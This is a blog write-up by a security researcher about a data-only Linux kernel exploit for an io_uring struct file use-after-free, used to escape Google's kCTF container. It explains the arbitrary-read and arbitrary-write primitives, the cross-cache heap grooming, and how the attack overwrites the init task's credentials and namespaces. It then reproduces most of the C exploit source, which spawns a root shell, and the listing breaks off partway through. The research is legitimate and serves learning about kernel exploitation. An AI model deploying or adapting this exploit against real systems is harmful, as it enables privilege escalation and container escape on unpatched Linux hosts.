Escaping the Google kCTF Container with a Data-Only Exploit

39 minute read

Introduction

I’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_ring has been a popular target in the program’s history up to this point, so I thought I’d find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a struct file UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on file UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn’t rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up in me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a struct file UAF yet, which was encouraging as it seemed it was worthwile “research”. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I’m very new to this type of thing and was just doing this as a personal challenge, if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.

The Bug

The bug is extremely simple (why can’t I find one like this?) and was exploited in kCTF in November of last year. I didn’t look very hard or ask around in the kCTF discord, but I was not able to find a PoC for this particular exploit. I was able to find several good write-ups of exploits leveraging similar vulnerabilities, especially this one by pqlpql and Awarau: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/.

I won’t go into the bug very much because it wasn’t really important to the excercise of being creative and writing a new kind of exploit (new for me); however, as you can tell from the patch, there was a call to put (decrease) a reference to a file without first checking if the file was a fixed file in the io_uring. There is this concept of fixed files which are managed by the io_uring itself, and there was this pattern throughout that codebase of doing checks on request files before putting them to ensure that they were not fixed files, and in this instance you can see that the check was not performed. So we are able from userspace to open a file (refcount == 1), register the file as a fixed file (recount == 2), call into the buggy code path by submitting an IORING_OP_MSG_RING request which, upon completion will erroneously decrement the refcount (refcount == 1), and then finally, call io_uring_unregister_files which ends up decrementing the recount to 0 and freeing the file while we still maintain an open file descriptor for it. This is about as good as bugs get. I need to find one of these.

What sort of variant analysis can we perform on this type of bug? I’m not so sure, it seems to be a broad category. But the careful code reviewer might have noticed that everywhere else in the codebase when there was the potential of putting a request file, the authors made sure to check if the file was fixed or not. This file put forgot to perform the check. The broad lesson I learned from this was to try and find instances of an action being performed multiple times in a codebase and look for descrepancies between those routines.

Giant Shoulders

It’s extremely important to stress that the blogpost I linked above from @pqlpql and @Awarau1 was very instrumental to this process. In that blogpost they broke-down in exquisite detail how to coerce the Linux kernel to free an entire page of file objects back to the page allocator by utilizing a technique called “cross-cache”. file structs have their own dedicated cache in the kernel and so typical object replacement shenanigans in UAF situations aren’t very useful in this instance, regardless of the struct file size. Thanks to their blogpost, the concept of “cross-cache” has been used and discussed more and more, at least on Twitter from my anecdotal experience.

Instead of using this trick of getting our entire victim page of file objects sent back to the page allocator only to have the page used as the backing for general cache objects, I elected to have the page reallocated in the form of the a pipe buffer. Please see this blogpost by @pqlpql for more information (this is a great writeup in general). This is an extremely powerful technique because we control all of the contents of the pipe buffer (via writes) and we can read 100% of the page contents (via reads). It’s also extremely reliable in my expierence. I’m not going to go into too much depth here because this wasn’t any of my doing, this is 100% the people mentioned thus far. Please go read the material from them.

Arbitrary Read

The first thing I started to look for, was a way to leak data, because I’ve been hardwired to think that all Linux kernel exploits follow the same pattern of achieving a leak which defeats KASLR, finding some valuable objects in memory, overwriting a function pointer blah blah blah. (Turns out this is not the case and some really talented people have really opened my mind in this area.) The only thing I knew for certain at this point was I have an open file descriptor at my disposal so let’s go looking around the file system code in the Linux kernel. One of the first things that caught my eye was the fcntl syscall in fs/fcntl.c. In general what I was doing at this point, was going through syscall tables for the Linux kernel and seeing which syscalls took an fd as an argument. From there, I would visit the portion of the kernel codebase which handled that syscall implementation and I would ctrl-f for the function copy_to_user. This seemed like a relatively logical way to find a method of leaking data back to userspace.

The copy_to_user function is a key part of the Linux kernel’s interface with user space. It’s used to copy data from the kernel’s own memory space into the memory space of a user process. This function ensures that the copy is done safely, respecting the separation between user and kernel memory.

Now if you go to the source code and do the find on copy_to_user, the 2nd result is a snippet in this bit right here:

static long fcntl_rw_hint(struct file *file, unsigned int cmd,
			  unsigned long arg)
{
	struct inode *inode = file_inode(file);
	u64 __user *argp = (u64 __user *)arg;
	enum rw_hint hint;
	u64 h;

	switch (cmd) {
	case F_GET_RW_HINT:
		h = inode->i_write_hint;
		if (copy_to_user(argp, &h, sizeof(*argp)))
			return -EFAULT;
		return 0;
	case F_SET_RW_HINT:
		if (copy_from_user(&h, argp, sizeof(h)))
			return -EFAULT;
		hint = (enum rw_hint) h;
		if (!rw_hint_valid(hint))
			return -EINVAL;

		inode_lock(inode);
		inode->i_write_hint = hint;
		inode_unlock(inode);
		return 0;
	default:
		return -EINVAL;
	}
}

You can see that in the F_GET_RW_HINT case, a u64 (“h”), is copied back to userspace. That value comes from the value of inode->i_write_hint. And inode itself is returned from file_inode(file). The source code for that function is as follows:

static inline struct inode *file_inode(const struct file *f)
{
	return f->f_inode;
}

Lol, well then. If we control the file, then we control the inode as well. A struct file looks like this:

struct file {
	union {
		struct llist_node	fu_llist;
		struct rcu_head 	fu_rcuhead;
	} f_u;
	struct path		f_path;
	struct inode		*f_inode;	/* cached value */
<SNIP>

And since we’re using the pipe buffer as our replacement object (really the entire page), we can set inode to be an arbitrary address. Let’s go check out the inode struct and see what we can learn about this i_write_hint member.

struct inode {
	umode_t			i_mode;
	unsigned short		i_opflags;
	kuid_t			i_uid;
	kgid_t			i_gid;
	unsigned int		i_flags;

#ifdef CONFIG_FS_POSIX_ACL
	struct posix_acl	*i_acl;
	struct posix_acl	*i_default_acl;
#endif

	const struct inode_operations	*i_op;
	struct super_block	*i_sb;
	struct address_space	*i_mapping;

#ifdef CONFIG_SECURITY
	void			*i_security;
#endif

	/* Stat data, not accessed from path walking */
	unsigned long		i_ino;
	/*
	 * Filesystems may only read i_nlink directly.  They shall use the
	 * following functions for modification:
	 *
	 *    (set|clear|inc|drop)_nlink
	 *    inode_(inc|dec)_link_count
	 */
	union {
		const unsigned int i_nlink;
		unsigned int __i_nlink;
	};
	dev_t			i_rdev;
	loff_t			i_size;
	struct timespec64	i_atime;
	struct timespec64	i_mtime;
	struct timespec64	i_ctime;
	spinlock_t		i_lock;	/* i_blocks, i_bytes, maybe i_size */
	unsigned short          i_bytes;
	u8			i_blkbits;
	u8			i_write_hint;
<SNIP>

So i_write_hint is a u8, aka, a single byte. This is perfect for what we need, inode becomes the address from which we read a byte back to userland (plus the offset to the member).

Since we control 100% of the backing data of the file, we thus control the value of the inode member. So if we set up a fake file struct in memory via our pipe buffer and have the inode member be 0x1337, the kernel will try to deref 0x1337 as an address and then read a byte at the offset of the i_write_hint member. So this is an arbitrary read for us, and we found it in the dumbest way possible.

This was really encouraging for me that we found an arbitrary read gadget so quickly, but what should we aim the read at?

Finding a Read Target

So we can read data at any address we want, but we don’t know what to read. I struggled thinking about this for a while, but then remembered that the cpu_entry_area was not randomized boot to boot, it is always at the same address. I knew this from the above blogpost about the file UAF, but also vaguely from @ky1ebot tweets like this one.

cpu_entry_area is a special per-CPU area in the kernel that is used to handle some types of interrupts and exceptions. There is this concept of Interrupt Stacks in the kernel that can be used in the event that an exception must be handled for instance.

After doing some debugging with GDB, I noticed that there was at least one kernel text pointer that showed up in the cpu_entry_area consistently and that was an address inside the error_entry function which is as follows:

SYM_CODE_START_LOCAL(error_entry)
	UNWIND_HINT_FUNC

	PUSH_AND_CLEAR_REGS save_ret=1
	ENCODE_FRAME_POINTER 8

	testb	$3, CS+8(%rsp)
	jz	.Lerror_kernelspace

	/*
	 * We entered from user mode or we're pretending to have entered
	 * from user mode due to an IRET fault.
	 */
	swapgs
	FENCE_SWAPGS_USER_ENTRY
	/* We have user CR3.  Change to kernel CR3. */
	SWITCH_TO_KERNEL_CR3 scratch_reg=%rax
	IBRS_ENTER
	UNTRAIN_RET

	leaq	8(%rsp), %rdi			/* arg0 = pt_regs pointer */
.Lerror_entry_from_usermode_after_swapgs:

	/* Put us onto the real thread stack. */
	call	sync_regs
	RET
<SNIP>

error_entry seemed to be used as an entry point for handling various exceptions and interrupts, so it made sense to me that an offset inside the function, might be found on what I was guessing was an interrupt stack in the cpu_entry_area. The address was the address of the call sync_regs portion of the function. I was never able to confirm what types of common exceptions/interrupts would’ve been taking place on the system that was pushing that address onto the stack presumably when the call was executed, but maybe someone can chime in and correct me if I’m wrong about this portion of the exploit. It made sense to me at least and the address’ presence in the cpu_entry_area was extremely common to the point that it was never absent during my testing. Armed with a kernel text address at a known offset, we could now defeat KASLR with our arbitrary read. At this point we have the read, the read target, and KASLR defeated.

Again, this portion didn’t take very long to figure out because I had just been introduced to cpu_entry_area by the aforementioned blogposts at the time.

Where are the Write Gadgets?

I actually struggled to find a satisfactory write gadget for a few days. I was kind of spoiled by my experience finding my arbitrary read gadget and thought this would be a similarly easy search. I followed roughly the same process of going through syscalls which took an fd as an argument and tracing through them looking for calls to copy_to_user, but I didn’t have the same luck. During this time, I was discussing the topic with my very talented friend @Firzen14 and he brought up this concept here: https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9. In the P0 blogpost, they talk about how the signalfd_ctx of a signalfd file is stored in the f.file->private_data field and how the signalfd syscalls allows the attacker to perform a write of the ctx->sigmask. So in our situation, since we control the entire fake file contents, forging a fake signalfd_ctx in memory would be quite easy since we have access to an entire page of memory.

I couldn’t use this technique for my personally imposed challenge though since the technique was already published. But this did open my eyes to the concept of storing contexts and objects in the private_data field of our struct file. So at this point, I went hunting for usages of private_data in the kernel code base. As you can see, the member is used in many many places: https://elixir.bootlin.com/linux/latest/C/ident/private_data.

This was very encouraging to me since I was bound to find some way to achieve an arbitrary write with so many instances of the member being used in so many different code paths; however, I still struggled a while finding a suitable gadget. Finally, I decided to look back at io_uring itself.

Looking for instances where the file->private_data was used, I quickly found an instance right in the very function that was related to the bug. In io_msg_ring, you can see that a target_ctx of type io_ring_ctx is derived from the req->file->private data. Since we control the fake file, we control can control the private_data contents (a pointer to a fake io_ring_ctx in this case).

io_msg_ring is used to pass data from one io ring to another, and you can see that in io_fill_cqe_aux, we actually retrieve a io_uring_cqe struct from our potentially faked io_uring_ctx via io_get_cqe. Immediately, we see several WRITE_ONCE macros used to write data to this object. This was looking extremely promising. I initially was going to use this write as my gadget, but as you will see later, the write sequences and the offsets at which they occur, didn’t really fit my exploitation plan. So for now, we’ll find a 2nd write in the same code path.

Immediately after the call to io_fill_cqe_aux, there is one to io_commit_cqring using our faked io_uring_ctx:

static inline void io_commit_cqring(struct io_ring_ctx *ctx)
{
	/* order cqe stores with ring update */
	smp_store_release(&ctx->rings->cq.tail, ctx->cached_cq_tail);
}

This is basically a memcpy, we write the contents of ctx->cached_cq_tail (100% user-controlled) to &ctx->ring->cq.tail (100% user-controlled). The size of the write in this case is 4 bytes. So we have achieved an arbitrary 4 byte write. From here, it just boils down to what type of exploit you want to write, so I decided to do one I had never done in the spirit of my self-imposed challenge.

Exploitation Plan

Now that we have all the possible tools we could need, it was time to start crafting an exploitation plan. In the kCTF environment you are running as an unprivileged user inside of a container, and your goal is to escape the container and read the flag value from the host file system.

I honestly had no idea where to start in this regard, but luckily there are some good articles out there explaining the situation. This post from Cyberark was extremely helpful in understanding how containerization of a task is achieved in the kernel. And I also got some very helpful pointers from Andy Nguyen’s blog post on his kCTF exploit. Huge thanks to Andy for being one of the few to actually detail their steps for escaping the container.

Finding Init

At this point, my goal is to find the host Init task_struct in memory and find the value of a few important members: real_cred, cred, and nsproxy. real_cred is used to track the user and group IDs that were originally responsible for creating the process and unlike cred, real_cred remains constant and does not change due to things like setuid. cred is used to convey the “effective” credentials of a task, like the effective user ID for instance. Finally, and super importantly because we are trapped in a container, nsproxy is a pointer to a struct that contains all of the information about our task’s namespaces like network, mount, IPC, etc. All of these members are pointers, so if we are able to find their values via our arbitrary read, we should then be able to overwrite our own credentials and namespace in our task_struct. Luckily, the address of the init task is a constant offset from the kernel base, so once we broke KASLR with our read of the error_entry address, we can then copy those values with our arbitrary read capability since they would reside at known addresses (offsets from the init task symbol).

Forging Objects

With those values in hand, we now need to find our own task_struct in memory so that we can overwrite our members with those of init. To do this, I took advantage of the fact that the task_struct has a linked list of tasks on the system. So early in the exploit, I spawn a child process with a known name, this name fits within the task_struct comm field, and so as I traverse through the linked list of tasks on the system, I just simply check each task’s comm field for my easily identifiable child process. You can see how I do that in this code snippet:

void traverse_tasks(void)
{    
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
    { 
        err("Invalid task after init: 0x%lx", current);    
    }

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
    {
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
        {
            g_target_task = current;
        }

        // If we find our target comm, save it
        if (!strcmp(current_comm, OUR_TASK))
        {
            g_our_task = current;
        }
    }
}

You can also see that not only did we find our target task, we also found our own task in memory. This is important for the way I chose to exploit this bug because, remember that we need to fake a few objects in memory, like the io_uring_ctx for instance. Usually this done by crafting objects in the kernel heap and somehow discoverying their address with a leak. In my case, I have a whole pipe buffer which is 4096 bytes of memory to utilize. The only problem is, I have no idea where it is. But I do know that I have an open file descriptor to it, and I know that each task has a file descriptor table inside of its files member. After some time printk some offsets, I was able to traverse through my own task’s file descriptor table and learn the address of my pipe buffer. This is because the pipe buffer page is obviously page aligned so I can just page align the address we read from the file descriptor table as the address of our UAF file. So now I know exactly in memory where my pipe buffer is, and I also know what offset onto that page our UAF struct file resides. I have a small helper function to set a “scratch space” region address as a global and then use that memory to set up our fake io_uring_ctx. You can see those functions here, first finding our pipe buffer address:

void find_pipe_buf_addr(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;

    return;
}

And then determining the location of our scratch space where we will forge the fake io_uring_ctx:

// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
{
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }
}

Now we have one more read to do and this is really just to make the exploit easier. In order to avoid a lot of debugging while triggering my write, I need to make sure that my fake io_uring_ctx contains as many valid fields as necessary. If you start with a completely NULL object, you will have to troubleshoot every NULL-deref kernel panic and determine where you went wrong and what kind of value that member should have had. Instead, I chose to copy a legitimate instance of a real io_uring_ctx instead by reading and copying its contents to a global buffer. Working now from a good base, our forged object can then be set-up properly to perform our arbitrary write from, you can see me using the copy and updating the necessary fields here:

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;
}

Performing Our Writes

Now, it’s time to do our writes. Remember those three sequential writes we were going to use inside of io_fill_cqe_aux, but I said they wouldn’t work with the exploit plan? Well the reason was, those three writes were as follows:

cqe = io_get_cqe(ctx);
	if (likely(cqe)) {
		WRITE_ONCE(cqe->user_data, user_data);
		WRITE_ONCE(cqe->res, res);
		WRITE_ONCE(cqe->flags, cflags);

They worked really well until I went to overwrite the target nsproxy member of our target child task_struct. One of those writes inevitably overwrote the members right next to nsproxy: signal and sighand. This caused big problems for me because as interrupts occurred, those members (pointers) would be deref’d and cause the kernel to panic since they were invalid values. So I opted to just the 4-byte write instead inside io_commit_cqring. The 4-byte write also caused problems in that at some points current has it’s creds checked and with what basically amounted to a torn 8-byte write, we would leave current cred values in invalid states during these checks. This is why I had to use a child process. Huge shoutout to @pqlpql for tipping me off to this.

Now we can just use those same steps to overwrite the three members real_cred, cred, and nsproxy and now our child has all of the same privileges and capabilities including visiblity into the host root file system that init does. This is perfect, but I still wasn’t able to get the flag!

I started to panic at this point that I had seriously done something wrong. The exploit if FULL of paranoid checks: I reread every overwritten value to make sure it’s correct for instance, so I was confident that I had done the writes properly. It felt like my namespace was somehow not effective yet in the child process, like it was cached somewhere. But then I remembered in Andy Nguyen’s blog post, he used his root privileges to explictly set his namespace values with calls to setns. Once I added this step, the child was able to see the root file system and find the flag. Instead of giving my child the same namespaces as init, I was able to give it the same namespaces of itself lol. I still haven’t followed through on this to determine how setns is implemented, but this could probably be done without explicit setns calls and only with our read and write tools:

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    while (1)
    {
        if (*(int *)g_shmem == 0x1337)
        {
            sleep(3);
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);
        }

        else { sleep(2); }
    }
}

And finally I was able to drop into a root shell and capture the flag, escaping the container. One huge obstacle when I tried using my exploit on the Google infrastructure was that their kernel was compiled with SELinux support and my test environment was not. This ended up not being a big deal, I had some out of band confirmation/paranoia checks I had to leave out but fortunately the arbitrary read we used isn’t actually hooked in any way by SELinux unlike most of the other fcntl syscall flags. At that point remember, we don’t know enough information to fake any objects in memory so I’d be dead in the water if that read method was ruined by SELinux.

Conclusion

This was a lot of fun for me and I was able to learn a lot. I think these types of learning challenges are great and low-stakes. They can be fun to work on with friends as well, big thanks to everyone mentioned already and also @chompie1337 who had to listen to me freak out about not being able to read the flag once I had overwritten my creds. The exploit is posted below in full, let me know if you have any trouble understanding any of it, thanks.

// Compile
// gcc sploit.c -o sploit -l:liburing.a -static -Wall

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <stdarg.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <sys/timerfd.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#include "liburing.h"

// /sys/kernel/slab/filp/objs_per_slab
#define OBJS_PER_SLAB 16UL
// /sys/kernel/slab/filp/cpu_partial
#define CPU_PARTIAL 52UL
// Multiplier for cross-cache arithmetic
#define OVERFLOW_FACTOR 2UL
// Largest number of objects we could allocate per Cross-cache step
#define CROSS_CACHE_MAX 8192UL
// Fixed mapping in cpu_entry_area whose contents is NULL
#define NULL_MEM 0xfffffe0000002000UL
// Reading side of pipe
#define PIPE_READ 0
// Writing side of pipe
#define PIPE_WRITE 1
// error_entry inside cpu_entry_area pointer
#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
// Offset from `error_entry` pointer to kernel base
#define EE_OFF 0xe0124dUL
// Kernel text signature
#define KERNEL_SIGNATURE 0x4801803f51258d48UL
// Offset from kernel base to init_task
#define INIT_OFF 0x18149c0UL
// Offset from task to task->comm
#define COMM_OFF 0x738UL
// Offset from task to task->real_cred
#define REAL_CRED_OFF 0x720UL
// Offset from task to task->cred
#define CRED_OFF 0x728UL
// Offset from task to task->nsproxy
#define NSPROXY_OFF 0x780UL
// Offset from task to task->files
#define FILES_OFF 0x770UL
// Offset from task->files to &task->files->fdt
#define FDT_OFF 0x20UL
// Offset from &task->files->fdt to &task->files->fdt->fd
#define FD_ARRAY_OFF 0x8UL
// Offset from task to task->tasks.next
#define TASKS_NEXT_OFF 0x458UL
// Process name to give root creds to 
#define TARGET_TASK "blegh2"
// Our process name
#define OUR_TASK "blegh1"
// Offset from kernel base to io_uring_fops
#define FOPS_OFF 0x1220200UL

// Shared memory with child
void *g_shmem;

// Child pid
pid_t g_child = -1;

// io_uring instance to use
struct io_uring g_ring = { 0 };

// UAF file handle
int g_uaf_fd = -1;

// Track pipes
struct fd_pair {
    int fd[2];
};
struct fd_pair g_pipe = { 0 };

// The offset on the page where our `file` is
size_t g_off = 0;

// Our fake file that is a copy of a legit io_uring fd
unsigned char g_ring_copy[256] = { 0 };

// Keep track of files added in Cross-cache steps
int g_cc1_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc1_num = 0;
int g_cc2_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc2_num = 0;
int g_cc3_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc3_num = 0;

// Gadgets and offsets
uint64_t g_kern_base = 0;
uint64_t g_init_task = 0;
uint64_t g_target_task = 0;
uint64_t g_our_task = 0;
uint64_t g_cred_what = 0;
uint64_t g_nsproxy_what = 0;
uint64_t g_cred_where = 0;
uint64_t g_real_cred_where = 0;
uint64_t g_nsproxy_where = 0;
uint64_t g_files = 0;
uint64_t g_fdt = 0;
uint64_t g_file_array = 0;
uint64_t g_file_addr = 0;
uint64_t g_pipe_buf = 0;
uint64_t g_scratch = 0;
uint64_t g_fops = 0;

void err(const char* format, ...)
{
    if (!format) {
        exit(EXIT_FAILURE);
    }

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, ": %s\n", strerror(errno));

    sleep(5);
    exit(EXIT_FAILURE);
}

void info(const char* format, ...)
{
    if (!format) {
        return;
    }
    
    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
}

// Get FD for test file
int get_test_fd(int victim)
{
    // These are just different for kernel debugging purposes
    char *file = NULL;
    if (victim) { file = "/etc//passwd"; }
    else { file = "/etc/passwd"; }

    int fd = open(file, O_RDONLY);
    if (fd < 0)
    {
        err("`open()` failed, file: %s", file);
    }

    return fd;
}

// Set-up the file that we're going to use as our victim object
void alloc_victim_filp(void)
{
    // Open file to register
    g_uaf_fd = get_test_fd(1);
    info("Victim fd: %d", g_uaf_fd);

    // Register the file
    int ret = io_uring_register_files(&g_ring, &g_uaf_fd, 1);
    if (ret)
    {
        err("`io_uring_register_files()` failed");
    }

    // Get hold of the sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
    {
        err("`io_uring_get_sqe()` failed");
    }

    // Init sqe vals
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = 0;
    sqe->flags |= IOSQE_FIXED_FILE;

    ret = io_uring_submit(&g_ring);
    if (ret < 0)
    {
        err("`io_uring_submit()` failed");
    }

    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);
}

// Set CPU affinity for calling process/thread
void pin_cpu(long cpu_id)
{
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(cpu_id, &mask);
    if (sched_setaffinity(0, sizeof(mask), &mask) == -1)
    {
        err("`sched_setaffinity()` failed: %s", strerror(errno));
    }

    return;
}

// Increase the number of FDs we can have open
void increase_fds(void)
{
    struct rlimit old_lim, lim;
	
	if (getrlimit(RLIMIT_NOFILE, &old_lim) != 0)
    {
        err("`getrlimit()` failed: %s", strerror(errno));
    }
		
	lim.rlim_cur = old_lim.rlim_max;
	lim.rlim_max = old_lim.rlim_max;

	if (setrlimit(RLIMIT_NOFILE, &lim) != 0)
    {
		err("`setrlimit()` failed: %s", strerror(errno));
    }

    info("Increased fd limit from %d to %d", old_lim.rlim_cur, lim.rlim_cur);

    return;
}

void create_pipe(void)
{
    if (pipe(g_pipe.fd) == -1)
    {
        err("`pipe()` failed");
    }
}

void release_pipe(void)
{
    close(g_pipe.fd[PIPE_WRITE]);
    close(g_pipe.fd[PIPE_READ]);
}

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    while (1)
    {
        if (*(int *)g_shmem == 0x1337)
        {
            sleep(3);
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);
        }

        else { sleep(2); }
    }
}

// Set-up environment for exploit
void setup_env(void)
{
    // Make sure a page is a page and we're not on some bullshit machine
    long page_sz = sysconf(_SC_PAGESIZE);
    if (page_sz != 4096L)
    {
        err("Page size was: %ld", page_sz);
    }

    // Pin to CPU 0
    pin_cpu(0);
    info("Pinned process to core-0");

    // Increase FD limit
    increase_fds();

    // Create shared mem
    g_shmem = mmap(
        (void *)0x1337000,
        page_sz,
        PROT_READ | PROT_WRITE,
        MAP_ANONYMOUS | MAP_FIXED | MAP_SHARED,
        -1,
        0
    );
    if (g_shmem == MAP_FAILED) { err("`mmap()` failed"); }
    info("Shared memory @ 0x%lx", g_shmem);

    // Create child
    g_child = fork();
    if (g_child == -1)
    {
        err("`fork()` failed");
    }

    // Child
    if (g_child ==  0)
    {
        child_exec();
    }
    info("Spawned child: %d", g_child);

    // Change our name
    if (prctl(PR_SET_NAME, OUR_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    // Create io ring
    struct io_uring_params params = { 0 };
    if (io_uring_queue_init_params(8, &g_ring, &params))
    {
        err("`io_uring_queue_init_params()` failed");
    }
    info("Created io_uring");

    // Create pipe
    info("Creating pipe...");
    create_pipe();
}

// Decrement file->f_count to 0 and free the filp
void do_uaf(void)
{
    if (io_uring_unregister_files(&g_ring))
    {
        err("`io_uring_unregister_files()` failed");
    }

    // Let the free actually happen
    usleep(100000);
}

// Cross-cache 1:
// Allocate enough objects that we have definitely allocated enough
// slabs to fill up the partial list later when we free an object from each
// slab
void cc_1(void)
{
    // Calculate the amount of objects to spray
    uint64_t spray_amt = (OBJS_PER_SLAB * (CPU_PARTIAL + 1)) * OVERFLOW_FACTOR;
    g_cc1_num = spray_amt;

    // Paranoid
    if (spray_amt > CROSS_CACHE_MAX) { err("Illegal spray amount"); }

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc1_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 2:
// Allocate OBJS_PER_SLAB to *probably* create a new active slab
void cc_2(void)
{
    // Step 2:
    // Allocate OBJS_PER_SLAB to *probably* create a new active slab
    uint64_t spray_amt = OBJS_PER_SLAB - 1;
    g_cc2_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc2_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 3:
// Allocate enough objects to definitely fill the rest of the active slab
// and start a new active slab
void cc_3(void)
{
    uint64_t spray_amt = OBJS_PER_SLAB + 1;
    g_cc3_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc3_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 4:
// Free all the filps from steps 2, and 3. This will place our victim 
// page in the partial list completely empty
void cc_4(void)
{
    //info("Freeing `filp` objects from CC2 and CC3...");
    for (size_t i = 0; i < g_cc2_num; i++)
    {
        close(g_cc2_fds[i]);
    }

